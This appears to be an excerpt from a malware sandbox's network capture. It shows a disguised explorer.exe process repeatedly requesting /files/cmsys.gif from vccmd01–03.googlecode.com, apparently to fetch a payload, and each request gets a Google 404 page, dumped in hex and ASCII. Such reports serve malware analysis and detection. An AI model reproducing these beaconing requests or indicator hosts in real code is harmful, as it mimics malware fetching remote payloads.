6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:12.758996010 CEST1393INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  18192.168.2.449791142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:23.981744051 CEST1453OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:24.008917093 CEST1455INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:23 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:24.008934021 CEST1455INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  19192.168.2.449793142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:26.143997908 CEST1466OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:26.171617985 CEST1467INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:26 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:26.171638012 CEST1468INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  2192.168.2.44978251.81.194.202443C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  20192.168.2.449794142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:28.479887962 CEST1469OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:28.507208109 CEST1470INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:28 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:28.507251024 CEST1471INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  21192.168.2.449802142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:40.322120905 CEST9192OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:40.348905087 CEST9193INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:40 GMT
